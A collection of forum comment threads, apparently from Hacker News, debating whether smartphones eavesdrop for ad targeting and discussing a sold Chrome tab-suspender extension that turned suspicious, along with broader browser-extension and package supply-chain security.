Meanwhile they literally own the device and the services most people use. They have your search, they have your email, they have social graphs. They can literally make inferences before you even think to talk about them with other people! (and we've seen this happen before with things like disease and pregnancy reveals)

We're at the point where most people's cell phones hold more personal data than they could even recall on demand.

So why on earth would they go and muddy all that easily weighted data with noisy data like everything you say? Literally every other form of interaction is already giving them better, more concise information about you...

-

> There is no proof it happens, and no proof it doesn’t happen, because it’s non-trivial to detect based on network activity. The only evidence is observing content relevant to what was being spoken about being suggested across apps.

I can't believe people are entertaining this kind of stuff on HN.

You make an unreasonable claim... then act like because you yourself can't prove your unreasonable claim it should be entertained? What?

That's not how that works. You have no actual proof for your unreasonable claim... then that's it. It ends there. The burden doesn't suddenly fall on others to prove the contrary!

Come back with even a modicum of proof. Literally any real proof other than anecdotes where the ad companies who literally have almost all the data in your life anyways are able to come up with topics you're interested in... and maybe someone will entertain this.

And no, talking about something and getting an ad for it after is not proof any more than having a leaf fall on your head while you stand under in a mid-autumn forest right after you whispered "gravity" is proof that the forest is listening to your words.


Go back and reread: I started this thread with proof I personally witnessed. Prove it doesn’t happen.


> I’d like to see an actual technical write up of this: network logs, tracing of the android device activity etc.

FWIW there’s a technical paper[0] that summarizes existing studies as of 2019, and it’s been neither definitively proven nor disproven that it happens. Turns out it’s not at all that trivial to detect.

From the paper:

> Perhaps most importantly, Pan et al. were not able to rule out the scenario of apps transforming audio recordings into less detectable text transcripts or audio fingerprints before sending the information out. This would be a very realistic attack scenario. In fact, various popular apps are known to compress recorded audio in such a way [10, 33]. While all the choices that Pan et al. made regarding their experimental setup and methodology are completely understandable and were communicated transparently, the limitations do limit the significance of their findings. All in all, their approach would only uncover highly unsophisticated eavesdropping attempts. …

> Therefore, the fact that no evidence for large-scale mobile eavesdropping has been found so far should not be interpreted as an all-clear. It could only mean that it is difficult – under current circumstances perhaps even impossible – to detect such attacks effectively.

(Apparently, noticing relevant content being obviously suggested is the only way of detecting it at this time, and of course it comes with its own caveats.)

[0] https://link.springer.com/chapter/10.1007/978-3-030-22479-0_...


Well, I'm fairly confident that there'd be a lot of online noise about the iPhone's orange dot being on all the time, the way there was about Clipboard notifications.


I wonder if there is an equivalent of the orange dot on Android.

For sure, it’s an arms race between the ecosystem’s root vendor and app developers, but the possibility of the vendor itself using some privileged APIs that do not provide visual feedback is also a concern.


The Target thing was for related shopping. The scandal was that Target noticed before she told people explicitly.


To hear "Ok Google" it need to record everything and process everything. Adding "toilett paper" as a processing keyword would not be noticable on battery life.


Sure, but for the sort of thing being suggested, you’d need to go quite a bit beyond one or two extra keywords.


100 keywords then? There don't have to be that many.


Which one? Vice’s article and some answers on Quora imply continuous listening without engaging a virtual assistant.

In the case of my friend showing me this, it happened a few months ago and I can’t remember exactly how the demonstration went. I’m inclined to believe there was no hotword activation, as I remember being quite startled (at that point I disbelieved that a phone could be listening and suggesting relevant content right away), and as you noted, with hotword activation it would have been markedly less surprising.


From the vice article:

> For your smartphone to actually pay attention and record your conversation, there needs to be a trigger, such as when you say “hey Siri” or “okay Google.” In the absence of these triggers, any data you provide is only processed within your own phone. This might not seem a cause for alarm, but any third party applications you have on your phone—like Facebook for example—still have access to this “non-triggered” data. And whether or not they use this data is really up to them.


Every company vehemently denies this is possible.

Until they get caught. Then they issue a wishy-washy non-apology and put out a press release stating "We can do better."

We've been to this rodeo before.


This is nonsense.

If listening constantly was widespread it would have a dramatic effect on power consumption - and so battery life - and be noticed.


Isn’t this pretty much how voice-activated virtual assistants work? Microphones have to be listening in order for devices to respond to “Hey Siri” and “OK Google”, and it does impact battery life.


I think they have some kind of special optimized chip that can listen for only a specific phrase at very low power and wake the rest of the device when it hears it. It seems super unlikely that they can listen constantly to anything anyone says, pick out things that can be advertised for, and show ads for those things the next time the user browses without eating lots of power and data.


The wake phrase is different in different languages, yet they sell the same hardware to everybody. Therefore, obviously, the wake phrase is reprogrammable. It isn't baked into the silicon.


I think the combination of ever-growing lithium-ion battery capacity, hardware energy efficiency and performance with 7 nm and 5 nm processes, and improving on-device speech recognition makes it possible with little to no perceived battery-life degradation.


This is fear mongering because you literally have no credible proof.


Feel free to take it or leave it.


As you can see, I've chosen option C: calling it out as the fear mongering that it is.

Maybe read up on the concept of "extraordinary claims requiring extraordinary evidence"


If this were true, I think a single person, ever, would have been able to furnish evidence of how this actually works.

Since complex voice-recognition (of other than the activation hotword) is done off-device, you will be able to see network traffic as a result of this occurring. That's quite simple to check for.


> complex voice-recognition (of other than the activation hotword) is done off-device

Wrong. It’s been feasible to do on-device for years[0][1].

> That's quite simple to check for.

It’s also quite simple to check that it happens, if you have a Google phone. It was done in front of me last year[2]. It’s been demonstrated to happen by other people than me, so you don’t have to rely on my word here[3].

> a single person, ever, would have been able to furnish evidence of how this actually works.

I don’t think it’s easy to show how this works under the hood, since speech can be recognized on device and devices communicate with remote services very verbosely over HTTPS (probably with certificates pinned to prevent MITM) making it non-trivial to distinguish that traffic from background network activity. Recognized speech data doesn’t have to be communicated in real-time, in fact it would make sense to wait and batch it with other requests for efficiency.

(There’s a technical paper[4] that summarizes research in this direction as of 2019, and turns out it’s not trivial to definitely prove or disprove based on network activity.)

[0] https://ai.googleblog.com/2019/03/an-all-neural-on-device-sp...

[1] https://medium.com/better-programming/ios-speech-recognition...

[2] https://news.ycombinator.com/item?id=25622659

[3] https://www.vice.com/en/article/wjbzzy/your-phone-is-listeni...

[4] https://link.springer.com/chapter/10.1007/978-3-030-22479-0_...


While the technology is now somewhat accessible (as of 2019 in both cases you mention), this conspiracy theory dates back nearly to the introduction of smartphones. I have heard it as early as 2011.

A number of other anecdotal experiments, such as one performed by myself, failed to show this behavior. A more tightly controlled but still informal experiment by a vaguely related security firm failed to find this behavior[1]. An academic effort by researchers at Northwestern failed to find this behavior [2]. This is by far the most thorough academic effort on the topic I have seen.

Facebook has clearly denied it [3]. Google has not issued such a clear statement but has been reasonably open about changes in their policy on voice data [4]. After considering the issue from several angles, P. J. Vogt concluded that no such thing happens [5]. Even the paper you cite notes the total lack of evidence.

Perhaps most notably, almost all of the popular media reporting that bears headlines saying that your phone is listening to your conversations, actually say no such thing when you read the article. Instead they are talking about analytics on voice assistant activations and, frequently, voice memos in Facebook Messenger. Amusingly I've run into two cases where popular press had to issue retractions or corrections after they said that smartphones were always-listening.

The only serious sources I have ever seen assert that this is happening are Vice's Sam Nichols based on Dr. Henway. Henway makes some very specific claims to two different reporters but provides no explanation of how he came to that knowledge. To an almost comical extent, nearly all reporting in favor of this theory (that even claims to have a source) is based around the exact same quote from Henway, who has never published anything formal on the matter or even really elaborated beyond a single paragraph. Nichols only performs a very basic experiment and it is easy to come up with other ways he may have gotten the result he did - in fact, the experiment he performs is nearly identical to the ones performed by others that have failed to show results.

Look, I'm not totally unreceptive to the idea that this is happening, but I don't like people repeating the assertion-as-fact that it is a widespread behavior when major tech companies have denied it, and no real evidence has ever been amassed to show that it does happen.

Just my opinion, but... well, just all of our opinions. Let's be careful about calling them facts.

[1] https://www.wandera.com/phone-listening/ [2] https://www.ftc.gov/system/files/documents/public_events/141... [3] https://www.forbes.com/sites/amitchowdhry/2017/10/31/faceboo... [4] https://www.theverge.com/2020/8/5/21354805/google-email-audi... [5] https://gimletmedia.com/shows/reply-all/z3hlwr


I did not claim any facts beyond reporting my observations.

As to facts, I am not a security researcher myself, so I linked to articles when I encountered such a vehement rejection of my personal experience.

If you are calling me out on what I observed, then you are saying I am delusional or lying.

Google is changing their policies and the News app behavior, so I don’t know whether the experiment I witnessed is reproducible anymore. But I am reasonably sure that they would choose to stop showing relevant content as obviously but keep mining data, as that ultimately aligns with their business model.


> A friend and I were sitting at a bar, iPhones in pockets, discussing our recent trips in Japan and how we’d like to go back. The very next day, we both received pop-up ads on Facebook about cheap return flights to Tokyo.

> A private conversation with a friend about how I’d run out of data led to an ad about cheap 20 GB data plans

> Suddenly I was being told [sic] mid-semester courses at various universities

I absolutely believe Facebook can find system information like data caps, or can read notifications (as they explicitly ask for this to auto-fill SMS-based 2FA logins). As far as being in the same location as your buddy you took a trip with, that's a lack of imagination on the advertiser's part: you get ads to return to Japan the same way you get ads for the vacuum you just bought. As far as the writer possibly going back to school? I'd say many writers enjoy writing; so many, in fact, that prices have been depressed for decades. I'd assume many writers have to return to school and change careers.

Is it possible Facebook is listening? I won't dismiss it without at least reading the article. But the linked article reads like the author believes people are unique and, while they are, they're also far more predictable than we like to pretend.


Seems like another case where a successful Chrome extension was bought out so it could be used for either:

1. Mining the users' traffic and reselling it as market research, or

2. Using the users' computers as a pool for a residential proxy service, or

3. Replacing and inserting ads into users' browsers.

This is unfortunately quite common.


Who are the main organizations doing that? It seems quite organized.


Chrome extensions are an interesting study in trust. Even with their push for Manifest V3, you can still run arbitrary JS on any URL. Which, of course, allows arbitrary spying and manipulation.

If they hobble that, though, a large portion of extensions become useless. I don't personally see any real middle ground: it's either a credible risk, or too complicated for practical use. The way Manifest V3 hobbles practically required things like heuristics is a good example.


I've had an extension, which I downloaded for automatic tab reloading on Chrome, insert porn ads into YouTube. I think the extension was removed after I reported it, but considering Google does take payment for publishing extensions (unlike Mozilla) and puts them through review, why not do it right?


One of our testers had that addon installed, same issue with porn ads.


Interesting. I remember it being taken down immediately after my complaint; it would have been really bad if it had resurfaced.


I know it would break many extensions, but I am of the opinion that the architecture is all wrong.

There should instead be clear APIs granting only limited access (for example, right-click context menus, tab control without content access, etc.).
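
As a rough sketch of the kind of narrow surface I mean, using APIs that already exist today (assuming a manifest with only the "contextMenus" permission and no host permissions, so no ability to read or modify page content):

    // background.js -- an extension built only on narrow, declarative APIs.
    chrome.runtime.onInstalled.addListener(() => {
      chrome.contextMenus.create({
        id: "mute-tab",
        title: "Mute this tab",
        contexts: ["page"],
      });
    });

    chrome.contextMenus.onClicked.addListener((info, tab) => {
      if (info.menuItemId === "mute-tab" && tab && tab.id !== undefined) {
        // Tab control without content access: toggle audio, never read the page.
        chrome.tabs.update(tab.id, { muted: true });
      }
    });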

The idea will probably be met with opposition because I didn’t explain it well enough, but maybe someone will get the idea hah.

I've worked on large Chrome extensions that heavily rely on hacking UI on top of page content and it's truly awful. Everything you do feels like it will break at the touch of a feather, because it does. Sure, there are some ways of making that LESS painful, but at the end of the day it will always be dirty hacks.


Reminds me of the uBlock vs uBlock Origin story some years ago:

https://news.ycombinator.com/item?id=9437182

https://news.ycombinator.com/item?id=9718625


Also Nano Blocker. I had to spend HOURS unliking bullshit posts on my Instagram because the idiot maintainer sold it to some quite obviously sleazy dudes who harvested our cookies to run an Instagram bot.


What a low profile use for such a hack... And the idiot probably got away with 99% of those likes.


That story is still ongoing. "New" ublock is still scamming people


I'd just like to mention that if the community were determined enough, we'd:

1. Demand removal of the analytics software, and

2. If no action, fork and re-publish.

Obviously folks who aren't technical/didn't see these threads wouldn't get the benefit of an update.

This is something where an explicitly pro-open-source and anti-tracking (or at least minimal-tracking) policy by the browser extension stores would be valuable. The store itself could recommend the no-tracking community version instead. Of course this would have to happen on an individual basis and be carefully managed so as not to be abused.


They already did:

https://github.com/aciidic/thegreatsuspender-notrack

Plus you can download the old 7.16 version, which works fine and doesn't have the suspicious changes.


> This work carries no guarantees only to the best of my ability in 2 hours using notepad2 & AstroGrep. I am not a developer and do not intend to spend much time keeping this extension updated.


Unrelated to the security implications, Microsoft Edge is doing tab suspension natively in the latest builds.

https://www.windowslatest.com/2020/09/17/microsoft-edge-slee...


Vivaldi has also had a hibernate feature for a while, and Firefox too if I'm right.

TGS caused issues resulting in losing pinned tabs in Brave and Vivaldi, so I had to remove it there; now I'm glad I did.


Safari has done this for a while now; one of the many reasons you can get tons more battery life running Safari than Chrome.


This type of developer 'switch' is becoming so common that I now have to add my Chrome extensions to Google Alerts just to feel safe. As a user below comments: "We need to talk about how difficult it is to monetize browser extensions", because without that conversation we will see this continue.


I wrote a browser extension that interacted with a password manager.

I receive almost-weekly messages from folks offering to buy my extension.



Out of an abundance of paranoia, I always open all financial and secretive websites in Incognito mode, and I always disallow all extensions in Incognito mode.

We should really have separate dedicated browsers just for doing transactions.


Wouldn’t be perfect but I’d like to see the ability to prevent extensions from making any web requests.

I’d also like them to not silently update in the background.


I did the work of downloading a forked version [1] of the extension and disabling the mainline extension.

In doing so, I lost about 60 suspended tabs, with no record in history as to what they were.

In some ways, this is like a weight off my back. On the other hand, I was going to read those tabs, I swear!

Oh well, time for me to search jstor for a history of copper mine consolidation, again.

[1] https://github.com/aciidic/thegreatsuspender-notrack


Many comments in the GitHub issue mention Tabs Outliner as an alternative to the now-sketchy-looking The Great Suspender.

Speaking as a long time paid user of the free/paid Tabs Outliner, I can't recommend it strongly enough.

[0] https://chrome.google.com/webstore/detail/tabs-outliner/eggk...


It does not seem to be open source though. The "Website" link only points back to the Chrome store, and I found no mention of source code in the description. The Great Suspender at least was available as open source, so one could go from there and a) notice that the release tags stopped, b) use the existing source there.


For me, it is also a superior alternative to Tree Style Tab on Firefox. It has better keyboard shortcuts, and drag-and-drop support for tabs or entire subtrees is more reliable than in TST.

Unloading entire subtrees and restoring them on other computers is also a nice feature that I no longer want to be without.

The extension is closed source, and its dev sometimes needs a few weeks for important fixes, but it is still one of my favorite browser extensions out there.


What prevents bad actors from buying a popular extension and rolling out malicious code to everyone who uses the extension?

I mean except the integrity of extension developers.


This is happening repeatedly. Each extension can possibly go bad at any time if the dev decides to cash out.


That's weird; I think this story is only the second one I've ever read on this topic, so I assumed it was rare.


Nothing. I own a few extensions with users in the tens of thousands and receive so many emails from people/businesses trying to buy out the extensions for "monetization".

This is a huge issue and Google is doing absolutely nothing to address it.


I stopped using Great Suspender a few years back when Chrome built this in https://developers.google.com/web/updates/2015/09/tab-discar...
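
For the curious, here's a minimal sketch of triggering that built-in mechanism from an extension via the chrome.tabs API (assuming a Chrome version with extension-facing discard support):

    // Ask Chrome to discard every inactive tab it considers safe to drop.
    chrome.tabs.query({ active: false, discarded: false }, (tabs) => {
      for (const tab of tabs) {
        if (tab.id !== undefined && tab.autoDiscardable) {
          // Memory is freed; the tab reloads from its URL when revisited.
          chrome.tabs.discard(tab.id);
        }
      }
    });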

I encourage people to disable all Chrome extensions. They have unprecedented access to your data (they can read your bank credentials), and they are a big performance hit. For example, using Chrome DevTools you can see that LastPass doubles page load times.

You can use SimpleExtManager (it only has permissions to turn extensions on/off) to turn everything off until you need them.
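
Plausible permission-wise: a sketch of what such an on/off manager does, assuming a manifest with only the "management" permission (which grants no page access):

    // Disable every other extension; re-enabling is the same call with `true`.
    chrome.management.getAll((extensions) => {
      for (const ext of extensions) {
        const isSelf = ext.id === chrome.runtime.id;
        if (ext.type === "extension" && ext.enabled && !isSelf) {
          chrome.management.setEnabled(ext.id, false);
        }
      }
    });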


What about useful things like ghostery and uMatrix?


I keep a "temp" browser profile (Chrome -> Settings -> Add user profile) and install extensions there. That way you can use Ghostery on specific sites while it has no access to your important data in your main profile.


They both have full access. Some may say "do you trust these publishers?", but the way extensions are designed, there's no way to trust them. You have to be extremely vigilant and inspect the code every time the extension updates, and you aren't notified when there are updates.

I wouldn't install any extension permanently. I only keep LastPass, and it's disabled until it's needed for login.


So we should accept website analytics/tracking scripts that potentially record every click and cursor movement, under the guise of user research?


Three builds published to Chrome Webstore without corresponding commits published to GitHub.

This extension being GPLv2, is there a way to report this obvious license violation to Google/GitHub? Would they care?


TGS is absolutely critical for my everyday use: can someone confirm whether everything is still as described in the linked GitHub issue?


Why would things have suddenly reverted?


This is a problem with many package managers. Even if one downloads a package in Emacs from MELPA, how can one be sure it doesn't contain malware? Read through all the code in every dependency after every update?


Curated app stores are great at preventing malware because they prevent you from installing packages from anyone other than the official maintainer, including yourself.


In general, there is a huge problem with how we distribute software, and package managers are even worse.

We basically only look at the top level of things, when instead, every branch in the tree should have a bunch of security people watching it, like editors watch every change to a Wikipedia article, before it goes out.

Corporations using automation and technology have hijacked our "Free Speech" ideals, and caused us to think that it's a good thing when one party can push out a tweet to 5 million people at once, or a single corporation can buy up local stations and enforce talking points on journalism. That's not freedom of speech at all. That's just a preference for maintaining entrenched power because someone "amassed it voluntarily"... and this mentality extends recursively all the way down.

Take for example the first Twitter mega-celebrity. Ashton Kutcher himself amassed his audience voluntarily because he was chosen by TV and movie executives once upon a time to be used in mass media, and their platforms were "voluntarily" built in the past, from the invention of the TV, and people subscribed "voluntarily", and Twitter was built "voluntarily" and funded by VCs voluntarily, and so on. And the end result is that some power (in this case, audience) is concentrated in the hands of a few people, who disproportionately act as kingmakers for various other people and ideas. That's also how we get "too big to fail" issues in telecoms, banks, and so on.

In science, things work differently. Arxiv.org exists but peer review is a big thing. Wikipedia has multiple distrusting parties for each large article. So does Bitcoin (presumably, anyway).

In general, the more value (votes, data, code, money) accumulates in one place, the more "checks and balances" you should have for each release. You can't just have someone push out something in the middle of the night and have everyone pull it into their codebase via npm and then "launder" the (malicious) bugs through more and more releases. You need it to go through "peer review", and not on the top level of an entire tree, but rather, for each subtree there need to be people who understand what's going on.

THAT is a society that's far more secure, one that can't be easily backdoored by some hackers paid by a state to find vulnerabilities. And the capitalistic system we have today is pushing the other way (closed source, centralized databases, extracting rents, rewarding early investors through information asymmetry, etc.), and the result is stuff like SolarWinds, the Equifax hack, the Yahoo hack, etc. We're finally starting to put a tax on storing data without an explicit purpose; hopefully that will make it expensive enough that people will at least be custodying their own data. But when it comes to "broadcasting" things, I'd rather have fewer "real time pushes" and instead slow things down until we can "run byzantine consensus", gradually releasing to the public via concentric circles.

The full solution would involve Merkle trees where some security organizations and researchers / peers (anonymous or not, but with reputations) sign off on each changeset. Instead of just Apple or something. Git + Verified Claims can already support most of the infrastructure, btw.
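
As a toy sketch of the mechanics (Node.js; the names and flow are my own illustration, and a real system would need key distribution, revocation, and threshold rules):

    // Hash each changeset, build a Merkle root over them, have reviewers sign it.
    const crypto = require("crypto");

    const sha256 = (data) => crypto.createHash("sha256").update(data).digest("hex");

    function merkleRoot(hashes) {
      if (hashes.length === 0) return sha256("");
      if (hashes.length === 1) return hashes[0];
      const next = [];
      for (let i = 0; i < hashes.length; i += 2) {
        // Pair up hashes, duplicating the last one if the count is odd.
        next.push(sha256(hashes[i] + (hashes[i + 1] || hashes[i])));
      }
      return merkleRoot(next);
    }

    // Each reviewer signs the root; a release ships only with enough signatures.
    const root = merkleRoot(["diff-1", "diff-2", "diff-3"].map(sha256));
    const { privateKey, publicKey } = crypto.generateKeyPairSync("ed25519");
    const sig = crypto.sign(null, Buffer.from(root), privateKey);
    console.log("root:", root, "valid:", crypto.verify(null, Buffer.from(root), publicKey, sig));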


>The full solution would involve Merkle trees where some security organizations and researchers / peers (anonymous or not, but with reputations) sign off on each changeset. Instead of just Apple or something. Git + Verified Claims can already support most of the infrastructure, btw.

This barely works for open source software (how many open source projects have people auditing every commit?). How will it possibly work for closed source software?


As a left-libertarian leaning person, I believe that "the long arc of society bends towards collaboration rather than competition."

I'm talking about:

  Wikipedia beating Britannica and Encarta
  The Web beating AOL / MSN / Compuserve / Prodigy
  Apache and NGinX beating IIS
  Linux beating Windows for tons of apps & archs
  Science beating Alchemy
I mean, I believe it so strongly that I put years and reinvested tons of my own company's profits into an open source platform that would be an alternative to Facebook / LinkedIn / Google etc. (https://github.com/Qbix/Platform). And then I started an experimental project to "disrupt" our own company and decentralize the Web even further (https://intercoin.org). We still have a long way to go, but I think that just as the Web unleashed trillions in value that could never have been built on top of AOL, we will see the same with Web 2.0 (FAMGA) etc.

But it will take time. Open source collaboration is the tortoise, closed source competition is the hare.


This might address the "closed source" problem (although personally I'm skeptical it would work), but doesn't address the problem of how to get people to perform reviews.


True. That requires different incentives. But we have to move from a mindset of competition to collaboration first. Everyone building on the same platform and merging source code back unless there is a really good reason to fork and compete.


For anyone not clicking the link, TheMageKing opened this issue on Nov 3, 2020.



